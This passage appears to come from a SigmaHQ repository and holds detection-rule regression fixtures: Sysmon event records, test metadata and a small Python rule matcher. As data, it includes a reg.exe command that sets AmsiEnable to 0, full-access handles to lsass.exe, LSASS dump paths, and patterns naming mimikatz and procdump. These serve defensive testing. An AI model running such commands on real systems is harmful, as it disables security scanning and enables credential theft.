\"5AA13A44-0C90-68FC-BF1D-000000004002\",\n      \"ProcessId\": 10048,\n      \"Image\": \"C:\\\\Windows\\\\system32\\\\cmd.exe\",\n      \"TargetFilename\": \"C:\\\\Users\\\\Public\\\\persistence.bat\",\n      \"CreationUtcTime\": \"2025-10-24 23:52:38.276\",\n      \"User\": \"ATTACKRANGE\\\\Administrator\"\n    }\n  }\n}\n"
  },
  {
    "path": "regression_data/rules/windows/file/file_event/file_event_win_susp_public_folder_extension/info.yml",
    "content": "id: 9556b96b-462a-4238-a0bf-5e11ff0408fe\ndescription: N/A\ndate: 2025-10-24\nauthor: SigmaHQ Team\nrule_metadata:\n    - id: b447f7de-1e53-4cbf-bfb4-f1f6d0b04e4e\n      title: Suspicious Binaries and Scripts in Public Folder\nregression_tests_info:\n    - name: Positive Detection Test\n      type: evtx\n      provider: Microsoft-Windows-Sysmon\n      match_count: 1\n      path: regression_data/rules/windows/file/file_event/file_event_win_susp_public_folder_extension/b447f7de-1e53-4cbf-bfb4-f1f6d0b04e4e.evtx\n"
  },
  {
    "path": "regression_data/rules/windows/file/file_event/file_event_win_susp_recycle_bin_fake_exec/cd8b36ac-8e4a-4c2f-a402-a29b8fbd5bca.json",
    "content": "{\n  \"Event\": {\n    \"#attributes\": {\n      \"xmlns\": \"http://schemas.microsoft.com/win/2004/08/events/event\"\n    },\n    \"System\": {\n      \"Provider\": {\n        \"#attributes\": {\n          \"Name\": \"Microsoft-Windows-Sysmon\",\n          \"Guid\": \"5770385F-C22A-43E0-BF4C-06F5698FFBD9\"\n        }\n      },\n      \"EventID\": 11,\n      \"Version\": 2,\n      \"Level\": 4,\n      \"Task\": 11,\n      \"Opcode\": 0,\n      \"Keywords\": \"0x8000000000000000\",\n      \"TimeCreated\": {\n        \"#attributes\": {\n          \"SystemTime\": \"2025-10-24T23:51:54.709878Z\"\n        }\n      },\n      \"EventRecordID\": 67705,\n      \"Correlation\": null,\n      \"Execution\": {\n        \"#attributes\": {\n          \"ProcessID\": 3308,\n          \"ThreadID\": 4008\n        }\n      },\n      \"Channel\": \"Microsoft-Windows-Sysmon/Operational\",\n      \"Computer\": \"ar-win-dc.attackrange.local\",\n      \"Security\": {\n        \"#attributes\": {\n          \"UserID\": \"S-1-5-18\"\n        }\n      }\n    },\n    \"EventData\": {\n      \"RuleName\": \"-\",\n      \"UtcTime\": \"2025-10-24 23:51:54.705\",\n      \"ProcessGuid\": \"5AA13A44-0C90-68FC-BF1D-000000004002\",\n      \"ProcessId\": 10048,\n      \"Image\": \"C:\\\\Windows\\\\system32\\\\cmd.exe\",\n      \"TargetFilename\": \"C:\\\\RECYCLERS.BIN\\\\malware.exe\",\n      \"CreationUtcTime\": \"2025-10-24 23:51:54.705\",\n      \"User\": \"ATTACKRANGE\\\\Administrator\"\n    }\n  }\n}\n"
  },
  {
    "path": "regression_data/rules/windows/file/file_event/file_event_win_susp_recycle_bin_fake_exec/info.yml",
    "content": "id: 6d485a4e-83d1-4ead-8173-9fddddb3ba22\ndescription: N/A\ndate: 2025-10-24\nauthor: SigmaHQ Team\nrule_metadata:\n    - id: cd8b36ac-8e4a-4c2f-a402-a29b8fbd5bca\n      title: Suspicious File Creation Activity From Fake Recycle.Bin Folder\nregression_tests_info:\n    - name: Positive Detection Test\n      type: evtx\n      provider: Microsoft-Windows-Sysmon\n      match_count: 1\n      path: regression_data/rules/windows/file/file_event/file_event_win_susp_recycle_bin_fake_exec/cd8b36ac-8e4a-4c2f-a402-a29b8fbd5bca.evtx\n"
  },
  {
    "path": "regression_data/rules/windows/file/file_event/file_event_win_taskmgr_lsass_dump/69ca12af-119d-44ed-b50f-a47af0ebc364.json",
    "content": "{\n  \"Event\": {\n    \"#attributes\": {\n      \"xmlns\": \"http://schemas.microsoft.com/win/2004/08/events/event\"\n    },\n    \"System\": {\n      \"Provider\": {\n        \"#attributes\": {\n          \"Name\": \"Microsoft-Windows-Sysmon\",\n          \"Guid\": \"5770385F-C22A-43E0-BF4C-06F5698FFBD9\"\n        }\n      },\n      \"EventID\": 11,\n      \"Version\": 2,\n      \"Level\": 4,\n      \"Task\": 11,\n      \"Opcode\": 0,\n      \"Keywords\": \"0x8000000000000000\",\n      \"TimeCreated\": {\n        \"#attributes\": {\n          \"SystemTime\": \"2025-10-24T23:50:20.590884Z\"\n        }\n      },\n      \"EventRecordID\": 53968,\n      \"Correlation\": null,\n      \"Execution\": {\n        \"#attributes\": {\n          \"ProcessID\": 3308,\n          \"ThreadID\": 4008\n        }\n      },\n      \"Channel\": \"Microsoft-Windows-Sysmon/Operational\",\n      \"Computer\": \"ar-win-dc.attackrange.local\",\n      \"Security\": {\n        \"#attributes\": {\n          \"UserID\": \"S-1-5-18\"\n        }\n      }\n    },\n    \"EventData\": {\n      \"RuleName\": \"-\",\n      \"UtcTime\": \"2025-10-24 23:50:20.576\",\n      \"ProcessGuid\": \"5AA13A44-10B3-68FC-4E1E-000000004002\",\n      \"ProcessId\": 2956,\n      \"Image\": \"C:\\\\Windows\\\\system32\\\\taskmgr.exe\",\n      \"TargetFilename\": \"C:\\\\Users\\\\ADMINI~1\\\\AppData\\\\Local\\\\Temp\\\\lsass.DMP\",\n      \"CreationUtcTime\": \"2025-10-24 23:50:20.576\",\n      \"User\": \"ATTACKRANGE\\\\Administrator\"\n    }\n  }\n}\n"
  },
  {
    "path": "regression_data/rules/windows/file/file_event/file_event_win_taskmgr_lsass_dump/info.yml",
    "content": "id: 55db307d-4a36-4594-bea8-7d114714d3b4\ndescription: N/A\ndate: 2025-10-24\nauthor: SigmaHQ Team\nrule_metadata:\n    - id: 69ca12af-119d-44ed-b50f-a47af0ebc364\n      title: LSASS Process Memory Dump Creation Via Taskmgr.EXE\nregression_tests_info:\n    - name: Positive Detection Test\n      type: evtx\n      provider: Microsoft-Windows-Sysmon\n      match_count: 1\n      path: regression_data/rules/windows/file/file_event/file_event_win_taskmgr_lsass_dump/69ca12af-119d-44ed-b50f-a47af0ebc364.evtx\n"
  },
  {
    "path": "regression_data/rules/windows/image_load/image_load_side_load_cpl_from_non_system_location/2b140a5c-dc02-4bb8-b6b1-8bdb45714cde.json",
    "content": "{\n  \"Event\": {\n    \"#attributes\": {\n      \"xmlns\": \"http://schemas.microsoft.com/win/2004/08/events/event\"\n    },\n    \"System\": {\n      \"Provider\": {\n        \"#attributes\": {\n          \"Name\": \"Microsoft-Windows-Sysmon\",\n          \"Guid\": \"5770385F-C22A-43E0-BF4C-06F5698FFBD9\"\n        }\n      },\n      \"EventID\": 7,\n      \"Version\": 3,\n      \"Level\": 4,\n      \"Task\": 7,\n      \"Opcode\": 0,\n      \"Keywords\": \"0x8000000000000000\",\n      \"TimeCreated\": {\n        \"#attributes\": {\n          \"SystemTime\": \"2026-02-04T08:43:28.342637Z\"\n        }\n      },\n      \"EventRecordID\": 715282,\n      \"Correlation\": null,\n      \"Execution\": {\n        \"#attributes\": {\n          \"ProcessID\": 776,\n          \"ThreadID\": 4352\n        }\n      },\n      \"Channel\": \"Microsoft-Windows-Sysmon/Operational\",\n      \"Computer\": \"srv-01.midgardnet.tech\",\n      \"Security\": {\n        \"#attributes\": {\n          \"UserID\": \"S-1-5-18\"\n        }\n      }\n    },\n    \"EventData\": {\n      \"RuleName\": \"-\",\n      \"UtcTime\": \"2026-02-04 08:43:28.234\",\n      \"ProcessGuid\": \"14207D89-06B0-6983-CF01-000000004402\",\n      \"ProcessId\": 6672,\n      \"Image\": \"C:\\\\Users\\\\SwachchhandaP\\\\Downloads\\\\fsquirt.exe\",\n      \"ImageLoaded\": \"C:\\\\Users\\\\SwachchhandaP\\\\Downloads\\\\bthprops.cpl\",\n      \"FileVersion\": \"-\",\n      \"Description\": \"-\",\n      \"Product\": \"-\",\n      \"Company\": \"-\",\n      \"OriginalFileName\": \"-\",\n      \"Hashes\": \"MD5=221877743CF329314E571E9398EFCA70,SHA256=863390BB749E466975A6A5330CCD077C846E1F387AAE0327AFFE33DF87153E67,IMPHASH=7FF91A855D5B3D338EB5B4CE63698F4A\",\n      \"Signed\": \"false\",\n      \"Signature\": \"-\",\n      \"SignatureStatus\": \"Unavailable\",\n      \"User\": \"MIDGARDNET\\\\SwachchhandaP\"\n    }\n  }\n}\n"
  },
  {
    "path": "regression_data/rules/windows/image_load/image_load_side_load_cpl_from_non_system_location/info.yml",
    "content": "id: 8ee57597-baba-46bd-8a61-85ff51f7aab6\ndescription: N/A\ndate: 2026-02-04\nauthor: Swachchhanda Shrawan Poudel (Nextron Systems)\nrule_metadata:\n    - id: 2b140a5c-dc02-4bb8-b6b1-8bdb45714cde\n      title: System Control Panel Item Loaded From Uncommon Location\nregression_tests_info:\n    - name: Positive Detection Test\n      type: evtx\n      provider: Microsoft-Windows-Sysmon\n      match_count: 1\n      path: regression_data/rules/windows/image_load/image_load_side_load_cpl_from_non_system_location/2b140a5c-dc02-4bb8-b6b1-8bdb45714cde.evtx\n"
  },
  {
    "path": "regression_data/rules/windows/image_load/image_load_win_susp_dbgcore_dbghelp_load/416bc4a2-7217-4519-8dc7-c3271817f1d5.json",
    "content": "{\n  \"Event\": {\n    \"#attributes\": {\n      \"xmlns\": \"http://schemas.microsoft.com/win/2004/08/events/event\"\n    },\n    \"System\": {\n      \"Provider\": {\n        \"#attributes\": {\n          \"Name\": \"Microsoft-Windows-Sysmon\",\n          \"Guid\": \"5770385F-C22A-43E0-BF4C-06F5698FFBD9\"\n        }\n      },\n      \"EventID\": 7,\n      \"Version\": 3,\n      \"Level\": 4,\n      \"Task\": 7,\n      \"Opcode\": 0,\n      \"Keywords\": \"0x8000000000000000\",\n      \"TimeCreated\": {\n        \"#attributes\": {\n          \"SystemTime\": \"2025-11-27T07:57:32.309580Z\"\n        }\n      },\n      \"EventRecordID\": 676402,\n      \"Correlation\": null,\n      \"Execution\": {\n        \"#attributes\": {\n          \"ProcessID\": 3544,\n          \"ThreadID\": 4264\n        }\n      },\n      \"Channel\": \"Microsoft-Windows-Sysmon/Operational\",\n      \"Computer\": \"swachchhanda\",\n      \"Security\": {\n        \"#attributes\": {\n          \"UserID\": \"S-1-5-18\"\n        }\n      }\n    },\n    \"EventData\": {\n      \"RuleName\": \"-\",\n      \"UtcTime\": \"2025-11-27 07:57:32.308\",\n      \"ProcessGuid\": \"0197231E-046C-6928-160C-000000000D00\",\n      \"ProcessId\": 296,\n      \"Image\": \"C:\\\\Users\\\\Public\\\\wsass\\\\WerFaultSecure.exe\",\n      \"ImageLoaded\": \"C:\\\\Windows\\\\System32\\\\dbgcore.dll\",\n      \"FileVersion\": \"10.0.26100.7019 (WinBuild.160101.0800)\",\n      \"Description\": \"Windows Core Debugging Helpers\",\n      \"Product\": \"Microsoft® Windows® Operating System\",\n      \"Company\": \"Microsoft Corporation\",\n      \"OriginalFileName\": \"DBGCORE.DLL\",\n      \"Hashes\": \"SHA1=5E4F2C531C549BB72A658ED9DD16D491EDDBB286,MD5=FAB4B30C1C4F0A9202A7B42DCF1729DC,SHA256=1B48A4F8D20026E6C56E3AB4CC4788FA6425C8A75F8D91C2869FA533DE6B209E,IMPHASH=C324AAAC01F0F75C811E1F80C41B860C\",\n      \"Signed\": \"true\",\n      \"Signature\": \"Microsoft Windows\",\n      \"SignatureStatus\": 
\"Valid\",\n      \"User\": \"swachchhanda\\\\xodih\"\n    }\n  }\n}\n"
  },
  {
    "path": "regression_data/rules/windows/image_load/image_load_win_susp_dbgcore_dbghelp_load/info.yml",
    "content": "id: bc1c627e-6529-459d-9bd6-74ffb88b3320\ndescription: N/A\ndate: 2025-11-27\nauthor: Swachchhanda Shrawan Poudel (Nextron Systems)\nrule_metadata:\n    - id: 416bc4a2-7217-4519-8dc7-c3271817f1d5\n      title: Suspicious Loading of Dbgcore/Dbghelp DLLs from Uncommon Location\nregression_tests_info:\n    - name: Positive Detection Test\n      type: evtx\n      provider: Microsoft-Windows-Sysmon\n      path: regression_data/rules/windows/image_load/image_load_win_susp_dbgcore_dbghelp_load/416bc4a2-7217-4519-8dc7-c3271817f1d5.evtx\n"
  },
  {
    "path": "regression_data/rules/windows/process_access/proc_access_win_susp_dbgcore_dbghelp_load/9f5c1d59-33be-4e60-bcab-85d2f566effd.json",
    "content": "{\n  \"Event\": {\n    \"#attributes\": {\n      \"xmlns\": \"http://schemas.microsoft.com/win/2004/08/events/event\"\n    },\n    \"System\": {\n      \"Provider\": {\n        \"#attributes\": {\n          \"Name\": \"Microsoft-Windows-Sysmon\",\n          \"Guid\": \"5770385F-C22A-43E0-BF4C-06F5698FFBD9\"\n        }\n      },\n      \"EventID\": 10,\n      \"Version\": 3,\n      \"Level\": 4,\n      \"Task\": 10,\n      \"Opcode\": 0,\n      \"Keywords\": \"0x8000000000000000\",\n      \"TimeCreated\": {\n        \"#attributes\": {\n          \"SystemTime\": \"2025-11-27T07:57:32.317336Z\"\n        }\n      },\n      \"EventRecordID\": 676404,\n      \"Correlation\": null,\n      \"Execution\": {\n        \"#attributes\": {\n          \"ProcessID\": 3544,\n          \"ThreadID\": 4264\n        }\n      },\n      \"Channel\": \"Microsoft-Windows-Sysmon/Operational\",\n      \"Computer\": \"swachchhanda\",\n      \"Security\": {\n        \"#attributes\": {\n          \"UserID\": \"S-1-5-18\"\n        }\n      }\n    },\n    \"EventData\": {\n      \"RuleName\": \"-\",\n      \"UtcTime\": \"2025-11-27 07:57:32.315\",\n      \"SourceProcessGUID\": \"0197231E-046C-6928-160C-000000000D00\",\n      \"SourceProcessId\": 296,\n      \"SourceThreadId\": 5260,\n      \"SourceImage\": \"C:\\\\Users\\\\Public\\\\wsass\\\\WerFaultSecure.exe\",\n      \"TargetProcessGUID\": \"0197231E-2DD5-691E-0C00-000000000D00\",\n      \"TargetProcessId\": 860,\n      \"TargetImage\": \"C:\\\\WINDOWS\\\\system32\\\\lsass.exe\",\n      \"GrantedAccess\": \"0x1fffff\",\n      \"CallTrace\": 
\"C:\\\\WINDOWS\\\\SYSTEM32\\\\ntdll.dll+16bcc4|C:\\\\WINDOWS\\\\SYSTEM32\\\\ntdll.dll+17aee0|C:\\\\WINDOWS\\\\SYSTEM32\\\\KERNEL32.DLL+7f7dc|C:\\\\WINDOWS\\\\SYSTEM32\\\\KERNEL32.DLL+c8d28|C:\\\\WINDOWS\\\\SYSTEM32\\\\dbgcore.DLL+44c34|C:\\\\WINDOWS\\\\SYSTEM32\\\\dbgcore.DLL+48f2c|C:\\\\WINDOWS\\\\SYSTEM32\\\\dbgcore.DLL+3d414|C:\\\\WINDOWS\\\\SYSTEM32\\\\dbgcore.DLL+29c7c|C:\\\\WINDOWS\\\\SYSTEM32\\\\dbgcore.DLL+2a1f0|C:\\\\WINDOWS\\\\SYSTEM32\\\\dbgcore.DLL+4f894|C:\\\\Users\\\\Public\\\\wsass\\\\WerFaultSecure.exe+3a64|C:\\\\Users\\\\Public\\\\wsass\\\\WerFaultSecure.exe+2576|C:\\\\Users\\\\Public\\\\wsass\\\\WerFaultSecure.exe+20c9|C:\\\\Users\\\\Public\\\\wsass\\\\WerFaultSecure.exe+1a0b|C:\\\\Users\\\\Public\\\\wsass\\\\WerFaultSecure.exe+48cc|C:\\\\WINDOWS\\\\SYSTEM32\\\\KERNEL32.DLL+f17ac\",\n      \"SourceUser\": \"swachchhanda\\\\xodih\",\n      \"TargetUser\": \"NT AUTHORITY\\\\SYSTEM\"\n    }\n  }\n}\n"
  },
  {
    "path": "regression_data/rules/windows/process_access/proc_access_win_susp_dbgcore_dbghelp_load/info.yml",
    "content": "id: f0a580dc-386c-4049-8ca4-cef9f956dc4c\ndescription: N/A\ndate: 2025-11-27\nauthor: Swachchhanda Shrawan Poudel (Nextron Systems)\nrule_metadata:\n    - id: 9f5c1d59-33be-4e60-bcab-85d2f566effd\n      title: Suspicious Process Access to LSASS with Dbgcore/Dbghelp DLLs\nregression_tests_info:\n    - name: Positive Detection Test\n      type: evtx\n      provider: Microsoft-Windows-Sysmon\n      path: regression_data/rules/windows/process_access/proc_access_win_susp_dbgcore_dbghelp_load/9f5c1d59-33be-4e60-bcab-85d2f566effd.evtx\n"
  },
  {
    "path": "regression_data/rules/windows/process_access/proc_access_win_werfaultsecure_msmpeng_access/387df17d-3b04-448f-8669-9e7fd5e5fd8c.json",
    "content": "{\n  \"Event\": {\n    \"#attributes\": {\n      \"xmlns\": \"http://schemas.microsoft.com/win/2004/08/events/event\"\n    },\n    \"System\": {\n      \"Provider\": {\n        \"#attributes\": {\n          \"Name\": \"Microsoft-Windows-Sysmon\",\n          \"Guid\": \"5770385F-C22A-43E0-BF4C-06F5698FFBD9\"\n        }\n      },\n      \"EventID\": 10,\n      \"Version\": 3,\n      \"Level\": 4,\n      \"Task\": 10,\n      \"Opcode\": 0,\n      \"Keywords\": \"0x8000000000000000\",\n      \"TimeCreated\": {\n        \"#attributes\": {\n          \"SystemTime\": \"2025-11-27T07:22:22.033828Z\"\n        }\n      },\n      \"EventRecordID\": 445923,\n      \"Correlation\": null,\n      \"Execution\": {\n        \"#attributes\": {\n          \"ProcessID\": 3544,\n          \"ThreadID\": 4264\n        }\n      },\n      \"Channel\": \"Microsoft-Windows-Sysmon/Operational\",\n      \"Computer\": \"swachchhanda\",\n      \"Security\": {\n        \"#attributes\": {\n          \"UserID\": \"S-1-5-18\"\n        }\n      }\n    },\n    \"EventData\": {\n      \"RuleName\": \"-\",\n      \"UtcTime\": \"2025-11-27 07:22:22.031\",\n      \"SourceProcessGUID\": \"0197231E-FC2D-6927-810B-000000000D00\",\n      \"SourceProcessId\": 7224,\n      \"SourceThreadId\": 4144,\n      \"SourceImage\": \"C:\\\\Windows\\\\System32\\\\WerFaultSecure.exe\",\n      \"TargetProcessGUID\": \"0197231E-2DD8-691E-4D00-000000000D00\",\n      \"TargetProcessId\": 3472,\n      \"TargetImage\": \"C:\\\\ProgramData\\\\Microsoft\\\\Windows Defender\\\\Platform\\\\4.18.25100.9008-0\\\\MsMpEng.exe\",\n      \"GrantedAccess\": \"0x1fffff\",\n      \"CallTrace\": 
\"C:\\\\WINDOWS\\\\SYSTEM32\\\\ntdll.dll+1284|C:\\\\WINDOWS\\\\SYSTEM32\\\\KERNEL32.DLL+185c4|C:\\\\WINDOWS\\\\SYSTEM32\\\\KERNEL32.DLL+4fe50|C:\\\\Windows\\\\System32\\\\dbgcore.DLL+164cc|C:\\\\Windows\\\\System32\\\\dbgcore.DLL+23e6c|C:\\\\Windows\\\\System32\\\\dbgcore.DLL+1b230|C:\\\\Windows\\\\System32\\\\dbgcore.DLL+112b4|C:\\\\Windows\\\\System32\\\\dbgcore.DLL+117a8|C:\\\\Windows\\\\System32\\\\WerFaultSecure.exe+115a4|C:\\\\Windows\\\\System32\\\\WerFaultSecure.exe+6a9c|C:\\\\Windows\\\\System32\\\\WerFaultSecure.exe+7378|C:\\\\Windows\\\\System32\\\\WerFaultSecure.exe+834c|C:\\\\Windows\\\\System32\\\\WerFaultSecure.exe+2748|C:\\\\Windows\\\\System32\\\\WerFaultSecure.exe+27e4|C:\\\\WINDOWS\\\\SYSTEM32\\\\KERNEL32.DLL+8740|C:\\\\WINDOWS\\\\SYSTEM32\\\\ntdll.dll+d4464\",\n      \"SourceUser\": \"swachchhanda\\\\xodih\",\n      \"TargetUser\": \"NT AUTHORITY\\\\SYSTEM\"\n    }\n  }\n}\n"
  },
  {
    "path": "regression_data/rules/windows/process_access/proc_access_win_werfaultsecure_msmpeng_access/info.yml",
    "content": "id: bd66a891-01c3-40b6-aafd-5c1676b44cf3\ndescription: N/A\ndate: 2025-11-27\nauthor: Swachchhanda Shrawan Poudel (Nextron Systems)\nrule_metadata:\n    - id: 387df17d-3b04-448f-8669-9e7fd5e5fd8c\n      title: Suspicious Process Access of MsMpEng by WerFaultSecure - EDR-Freeze\nregression_tests_info:\n    - name: Positive Detection Test\n      type: evtx\n      provider: Microsoft-Windows-Sysmon\n      path: regression_data/rules/windows/process_access/proc_access_win_werfaultsecure_msmpeng_access/387df17d-3b04-448f-8669-9e7fd5e5fd8c.evtx\n"
  },
  {
    "path": "regression_data/rules/windows/process_creation/proc_creation_win_amsi_registry_tampering/7dbbcac2-57a0-45ac-b306-ff30a8bd2981.json",
    "content": "{\n  \"Event\": {\n    \"#attributes\": {\n      \"xmlns\": \"http://schemas.microsoft.com/win/2004/08/events/event\"\n    },\n    \"System\": {\n      \"Provider\": {\n        \"#attributes\": {\n          \"Name\": \"Microsoft-Windows-Sysmon\",\n          \"Guid\": \"5770385F-C22A-43E0-BF4C-06F5698FFBD9\"\n        }\n      },\n      \"EventID\": 1,\n      \"Version\": 5,\n      \"Level\": 4,\n      \"Task\": 1,\n      \"Opcode\": 0,\n      \"Keywords\": \"0x8000000000000000\",\n      \"TimeCreated\": {\n        \"#attributes\": {\n          \"SystemTime\": \"2025-12-25T14:30:27.369114Z\"\n        }\n      },\n      \"EventRecordID\": 16094,\n      \"Correlation\": null,\n      \"Execution\": {\n        \"#attributes\": {\n          \"ProcessID\": 3208,\n          \"ThreadID\": 1724\n        }\n      },\n      \"Channel\": \"Microsoft-Windows-Sysmon/Operational\",\n      \"Computer\": \"swachchhanda\",\n      \"Security\": {\n        \"#attributes\": {\n          \"UserID\": \"S-1-5-18\"\n        }\n      }\n    },\n    \"EventData\": {\n      \"RuleName\": \"-\",\n      \"UtcTime\": \"2025-12-25 14:30:27.352\",\n      \"ProcessGuid\": \"0197231E-4A83-694D-9E0E-000000000800\",\n      \"ProcessId\": 14144,\n      \"Image\": \"C:\\\\Windows\\\\System32\\\\reg.exe\",\n      \"FileVersion\": \"10.0.26100.1 (WinBuild.160101.0800)\",\n      \"Description\": \"Registry Console Tool\",\n      \"Product\": \"Microsoft® Windows® Operating System\",\n      \"Company\": \"Microsoft Corporation\",\n      \"OriginalFileName\": \"reg.exe\",\n      \"CommandLine\": \"\\\"C:\\\\WINDOWS\\\\system32\\\\reg.exe\\\" add \\\"HKCU\\\\Software\\\\Microsoft\\\\Windows Script\\\\Settings\\\" /v AmsiEnable /t REG_DWORD /d 0 /f\",\n      \"CurrentDirectory\": \"C:\\\\WINDOWS\\\\system32\\\\\",\n      \"User\": \"swachchhanda\\\\xodih\",\n      \"LogonGuid\": \"0197231E-AB9F-67AA-4C14-030000000000\",\n      \"LogonId\": \"0x3144c\",\n      \"TerminalSessionId\": 1,\n      
\"IntegrityLevel\": \"High\",\n      \"Hashes\": \"MD5=573EB13AC2BA31E9C2E17FB6DAD14154,SHA256=E295E776FD4F7F73DFAAA5698A19EA7A2F4A2F0C5E1681FAC94E45D00296C926,IMPHASH=A26BCB048DF34CBB422F2656F38634D0\",\n      \"ParentProcessGuid\": \"0197231E-EC48-694C-AA0C-000000000800\",\n      \"ParentProcessId\": 12456,\n      \"ParentImage\": \"C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\",\n      \"ParentCommandLine\": \"\\\"C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"\",\n      \"ParentUser\": \"swachchhanda\\\\xodih\"\n    }\n  }\n}\n"
  },
  {
    "path": "regression_data/rules/windows/process_creation/proc_creation_win_amsi_registry_tampering/info.yml",
    "content": "id: 242d26e0-1ce5-4a34-960d-144f34f60e37\ndescription: N/A\ndate: 2025-12-25\nauthor: Swachchhanda Shrawan Poudel (Nextron Systems)\nrule_metadata:\n    - id: 7dbbcac2-57a0-45ac-b306-ff30a8bd2981\n      title: Windows AMSI Related Registry Tampering Via CommandLine\nregression_tests_info:\n    - name: Positive Detection Test\n      type: evtx\n      provider: Microsoft-Windows-Sysmon\n      match_count: 1\n      path: regression_data/rules/windows/process_creation/proc_creation_win_amsi_registry_tampering/7dbbcac2-57a0-45ac-b306-ff30a8bd2981.evtx\n"
  },
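The fixtures above pair one Sysmon event (EID 11 file create, EID 10 process access, EID 7 image load, EID 1 process create) with an `info.yml` that pins the rule's expected `match_count`. The following is an added example, not SigmaHQ code and not the rule definitions themselves (those are not on this page): a minimal Sigma-style matcher that reads the same `Event -> System / EventData` JSON layout, evaluates simplified stand-in conditions named after the fixture directories above, and checks the per-rule hit count the way `match_count` does. The sample events are constructed, trimmed copies of fields shown on this page; the rule conditions, field modifiers and the `:Zone.Identifier` filter are this example's own assumptions.

```python
import re
from typing import Any

# Constructed sample events (not the full fixture records): same layout as the
# JSON above, trimmed to the fields the conditions read; backslashes doubled.
SAMPLE_EVENTS: list[dict[str, Any]] = [
    {"Event": {"System": {"EventID": 11}, "EventData": {
        "Image": "C:\\Windows\\system32\\taskmgr.exe",
        "TargetFilename": "C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\lsass.DMP"}}},
    {"Event": {"System": {"EventID": 11}, "EventData": {
        "Image": "C:\\Windows\\system32\\cmd.exe",
        "TargetFilename": "C:\\Users\\Public\\persistence.bat"}}},
    {"Event": {"System": {"EventID": 11}, "EventData": {
        "Image": "C:\\Windows\\system32\\cmd.exe",
        "TargetFilename": "C:\\evil.doc.lnk"}}},
    {"Event": {"System": {"EventID": 11}, "EventData": {
        "Image": "C:\\Windows\\explorer.exe",
        "TargetFilename": "C:\\Users\\Administrator\\Downloads\\procdump.exe"}}},
    # Sysmon logs the Mark-of-the-Web stream as its own EID 11: same path, ADS suffix.
    {"Event": {"System": {"EventID": 11}, "EventData": {
        "Image": "C:\\Windows\\explorer.exe",
        "TargetFilename": "C:\\Users\\Administrator\\Downloads\\procdump.exe:Zone.Identifier"}}},
    {"Event": {"System": {"EventID": 10}, "EventData": {
        "SourceImage": "C:\\Users\\Public\\wsass\\WerFaultSecure.exe",
        "TargetImage": "C:\\WINDOWS\\system32\\lsass.exe",
        "GrantedAccess": "0x1fffff",
        "CallTrace": "C:\\WINDOWS\\SYSTEM32\\ntdll.dll+16bcc4|C:\\WINDOWS\\SYSTEM32\\dbgcore.DLL+44c34"
                     "|C:\\Users\\Public\\wsass\\WerFaultSecure.exe+3a64"}}},
    {"Event": {"System": {"EventID": 1}, "EventData": {
        "Image": "C:\\Windows\\System32\\reg.exe",
        "CommandLine": "\"C:\\WINDOWS\\system32\\reg.exe\" add \"HKCU\\Software\\Microsoft\\Windows Script"
                       "\\Settings\" /v AmsiEnable /t REG_DWORD /d 0 /f"}}},
    # Benign control: an ordinary document write that should fire nothing.
    {"Event": {"System": {"EventID": 11}, "EventData": {
        "Image": "C:\\Windows\\explorer.exe",
        "TargetFilename": "C:\\Users\\Administrator\\Documents\\notes.txt"}}},
]

# Simplified stand-ins (assumed for this example, NOT the SigmaHQ rules): keys in a
# block are ANDed, a list value is ORed unless the key carries |all, string matching
# is case-insensitive, and a rule evaluates as "selection and not filter".
RULES: dict[str, dict[str, dict[str, Any]]] = {
    "file_event_win_taskmgr_lsass_dump": {
        "selection": {"EventID": 11, "Image|endswith": "\\taskmgr.exe",
                      "TargetFilename|contains": "\\lsass", "TargetFilename|endswith": ".dmp"}},
    "file_event_win_susp_public_folder_extension": {
        "selection": {"EventID": 11, "TargetFilename|startswith": "C:\\Users\\Public\\",
                      "TargetFilename|endswith": [".bat", ".exe", ".ps1", ".vbs"]}},
    "file_event_win_susp_lnk_double_extension": {
        "selection": {"EventID": 11, "TargetFilename|re": r"\.(doc|docx|pdf|xls|xlsx|txt)\.lnk$"}},
    "file_event_win_cred_dump_tools_dropped_files": {
        "selection": {"EventID": 11, "TargetFilename|contains": ["\\procdump", "\\mimikatz"]},
        # Without this filter the Zone.Identifier ADS write above raises a second alert.
        "filter": {"TargetFilename|endswith": ":Zone.Identifier"}},
    "proc_access_win_susp_dbgcore_dbghelp_load": {
        "selection": {"EventID": 10, "TargetImage|endswith": "\\lsass.exe",
                      "CallTrace|contains": ["dbgcore.dll", "dbghelp.dll"]}},
    "proc_creation_win_amsi_registry_tampering": {
        "selection": {"EventID": 1, "Image|endswith": "\\reg.exe",
                      "CommandLine|contains|all": ["Windows Script\\Settings", "AmsiEnable"]}},
}


def _field(event: dict[str, Any], name: str) -> Any:
    """EventID lives under System; every other field under EventData."""
    ev = event["Event"]
    if name in ev.get("System", {}):
        return ev["System"][name]
    return ev.get("EventData", {}).get(name)


def _match_one(value: Any, pattern: Any, mods: list[str]) -> bool:
    if value is None:
        return False
    if "re" in mods:
        return re.search(str(pattern), str(value), re.IGNORECASE) is not None
    v, p = str(value).lower(), str(pattern).lower()
    if "contains" in mods:
        return p in v
    if "startswith" in mods:
        return v.startswith(p)
    if "endswith" in mods:
        return v.endswith(p)
    return v == p


def match_block(event: dict[str, Any], block: dict[str, Any]) -> bool:
    """Every key of a selection/filter block must hold; list values OR unless |all."""
    for key, pattern in block.items():
        field, *mods = key.split("|")
        value = _field(event, field)
        patterns = pattern if isinstance(pattern, list) else [pattern]
        results = [_match_one(value, p, mods) for p in patterns]
        if not (all(results) if "all" in mods else any(results)):
            return False
    return True


def match_rule(event: dict[str, Any], rule: dict[str, dict[str, Any]]) -> bool:
    if not match_block(event, rule["selection"]):
        return False
    return not ("filter" in rule and match_block(event, rule["filter"]))


def run_rules(events, rules=RULES) -> dict[str, list[int]]:
    """Per rule, the indexes of the events it fired on."""
    return {name: [i for i, ev in enumerate(events) if match_rule(ev, rule)]
            for name, rule in rules.items()}


def check_match_count(hits: dict[str, list[int]], expected: int = 1) -> dict[str, bool]:
    """Same contract as match_count in the info.yml files: an exact hit count per rule."""
    return {name: len(idx) == expected for name, idx in hits.items()}


if __name__ == "__main__":
    hits = run_rules(SAMPLE_EVENTS)
    print(hits, check_match_count(hits))
```

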